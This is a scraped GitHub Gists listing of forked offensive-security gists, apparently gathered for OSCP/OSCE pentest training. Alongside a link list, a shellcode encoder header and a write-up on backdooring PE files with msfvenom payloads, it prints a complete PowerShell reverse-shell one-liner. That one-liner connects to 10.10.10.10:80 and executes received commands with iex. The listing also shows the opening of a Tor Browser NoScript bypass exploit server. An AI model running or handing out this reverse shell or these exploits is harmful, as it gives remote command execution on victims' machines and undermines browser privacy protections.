C4nnibaL
C4nnibaL
/ oscp_links.md
Created
October 10, 2018 01:17
— forked from natesubra/oscp_links.md
Useful OSCP Links
C4nnibaL
/ ascii-shellcode-encoder.py
Created
October 10, 2018 01:17
— forked from mgeeky/ascii-shellcode-encoder.py
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's substract arguments finding algorithm.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique, | |
| # and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler` | |
| # utility (as described in: Hacking - The Art of Exploitation). | |
| # | |
| # Basically one gives to the program's output a binary encoded shellcode, | |
| # and it yields on the output it's ASCII encoded form. | |
| # | |
| # This payload will at the beginning align the stack by firstly moving |
C4nnibaL
/ msfvenom-reverse-tcp-WaitForSingleObject.md
Created
October 10, 2018 01:16
— forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.
Abstract
This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.
Contents:
C4nnibaL
/ powershell_reverse_shell.ps1
Created
October 10, 2018 01:16
— forked from egre55/powershell_reverse_shell.ps1
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
C4nnibaL
/ TorBrowser_7.x_NoScript_bypass.py
Created
October 10, 2018 00:46
— forked from x0rz/TorBrowser_7.x_NoScript_bypass.py
Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer | |
| PORT_NUMBER = 31337 | |
| class myHandler(BaseHTTPRequestHandler): | |
| #Handler for the GET requests | |
| def do_GET(self): | |
| self.send_response(200) |